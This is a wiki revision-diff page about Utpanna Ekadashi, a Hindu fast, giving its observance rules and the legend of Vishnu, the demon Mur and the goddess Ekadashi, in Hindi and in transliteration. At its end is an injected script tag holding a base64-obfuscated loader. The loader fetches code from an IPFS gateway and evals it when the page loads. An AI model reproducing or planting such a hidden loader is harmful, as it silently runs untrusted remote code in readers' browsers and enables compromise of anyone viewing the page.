Difference between revisions of "उत्पन्ना एकादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
==व्रत और विधि==
 
==व्रत और विधि==
इस दिन भगवान श्री[[कृष्ण]] की पूजा की जाती है।[[पुराण|पुराणों]] के अनुसार मार्गशीर्ष कृष्ण पक्ष की एकादशी उत्पन्ना है। इस व्रत को करने से मनुष्य को जीवन में सुख शांति मिलती है। मृत्यु के पश्चात [[विष्णु]] के परम धाम का वास प्राप्त होता है। व्रत रहने वाले  को दशमी के दिन रात में भोजन नहीं करना चाहिए। एकादशी के दिन ब्रह्मवेला में ही भगवान को पुष्प, जल, धूप, दीप, अक्षत से पूजन करके नीराजन करना चाहिए। इस व्रत में केवल फलों का ही भोग लगाया जाता है। परनिंदक, चोर, दुराचारी, ब्राह्मणदोही, नास्तिक इन सबसे बात नहीं करनी चाहिए। यदि भूल से ऐसी गलती हो जाए तो सूर्य के सम्मुख स्थित होकर प्रार्थना करनी चाहिए।
+
इस दिन भगवान श्री [[कृष्ण]] की पूजा की जाती है। [[पुराण|पुराणों]] के अनुसार मार्गशीर्ष कृष्ण पक्ष की एकादशी उत्पन्ना है। इस व्रत को करने से मनुष्य को जीवन में सुख शांति मिलती है। मृत्यु के पश्चात [[विष्णु]] के परम धाम का वास प्राप्त होता है। व्रत रहने वाले  को दशमी के दिन रात में भोजन नहीं करना चाहिए। एकादशी के दिन ब्रह्मवेला में ही भगवान को पुष्प, जल, धूप, दीप, अक्षत से पूजन करके नीराजन करना चाहिए। इस व्रत में केवल फलों का ही भोग लगाया जाता है। परनिंदक, चोर, दुराचारी, ब्राह्मणदोही, नास्तिक इन सबसे बात नहीं करनी चाहिए। यदि भूल से ऐसी गलती हो जाए तो सूर्य के सम्मुख स्थित होकर प्रार्थना करनी चाहिए।
 
==व्रत कथा==
 
==व्रत कथा==
 
सतयुग में मुर नामक दैत्य चंद्रवती नामक राजधानी में रहता था। उसने सब देवताओं पर विजय प्राप्त कर इंद्रासन को जीत लिया था। वह [[सूर्य देवता|सूर्य]], [[चंद्र देवता|चंद्र]] आदि देवताओं के स्थान पर स्वयं प्रकाश पुंज बनकर चमकने लगा। देवताओं ने भगवान विष्णु की शरण ली। तब भगवान ने उसे मारने का उपाय सोचा और युद्ध प्रारम्भ कर दिया।
 
सतयुग में मुर नामक दैत्य चंद्रवती नामक राजधानी में रहता था। उसने सब देवताओं पर विजय प्राप्त कर इंद्रासन को जीत लिया था। वह [[सूर्य देवता|सूर्य]], [[चंद्र देवता|चंद्र]] आदि देवताओं के स्थान पर स्वयं प्रकाश पुंज बनकर चमकने लगा। देवताओं ने भगवान विष्णु की शरण ली। तब भगवान ने उसे मारने का उपाय सोचा और युद्ध प्रारम्भ कर दिया।

Revision as of 10:32, 22 May 2010

vrat aur vidhi

is din bhagavan shri krishna ki pooja ki jati hai. puranoan ke anusar margashirsh krishna paksh ki ekadashi utpanna hai. is vrat ko karane se manushy ko jivan mean sukh shaanti milati hai. mrityu ke pashchat vishnu ke param dham ka vas prapt hota hai. vrat rahane vale ko dashami ke din rat mean bhojan nahian karana chahie. ekadashi ke din brahmavela mean hi bhagavan ko pushp, jal, dhoop, dip, akshat se poojan karake nirajan karana chahie. is vrat mean keval phaloan ka hi bhog lagaya jata hai. paraniandak, chor, durachari, brahmanadohi, nastik in sabase bat nahian karani chahie. yadi bhool se aisi galati ho jae to soory ke sammukh sthit hokar prarthana karani chahie.

vrat katha

satayug mean mur namak daity chandravati namak rajadhani mean rahata tha. usane sab devataoan par vijay prapt kar iandrasan ko jit liya tha. vah soory, chandr adi devataoan ke sthan par svayan prakash puanj banakar chamakane laga. devataoan ne bhagavan vishnu ki sharan li. tab bhagavan ne use marane ka upay socha aur yuddh prarambh kar diya.

vishnuji ne banoan se danavoan ka sanhar to kar diya par mur mar n saka kyoanki vah kisi devata ke varadan se ajey tha. yuddh karate-karate jab kafi samay bit gaya to bhagavan ek gufa mean ghus ge. vah mur se l dana chho d badrikashram ki gufa mean aram karane lage. mur ne bhi pichha n chho da. mur unaka pichha karata aya aur jyoanhi vishnuji par prahar karana chaha tyoanhi vishnuji ke sharir se ek kanya paida huee jisane mur ka sanhar kar diya.

bhagavan vishnu us kanya par prasann hokar bole- 'he devi! tum aj margashirsh krishna ekadashi ko prakat huee ho isalie tumhara nam ekadashi hoga. tujhe log 'utpanna ekadashi' kahakar pukareange. aj se is ekadashi ke din tumhara poojan hoga. tum is sansar ke mayajal mean mohavash ulajhe praniyoan ko mujh tak lane mean saksham hogi.'

jo vyakti is din vrat rahakar tumhari pooja kareange ve pap mukt hokar vishnulok prapt kareange. teri aradhana karane vale prani dhan-dhany se poorn hokar sukh-labh bhogega. vahi kanya 'ekadashi' huee. varsh bhar ki chaubis ekadashiyoan mean is ekadashi ka apoorv mahatmy hai, vishnuji se utpann hone ke karan hi isaka nam 'utpanna ekadashi' p da.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>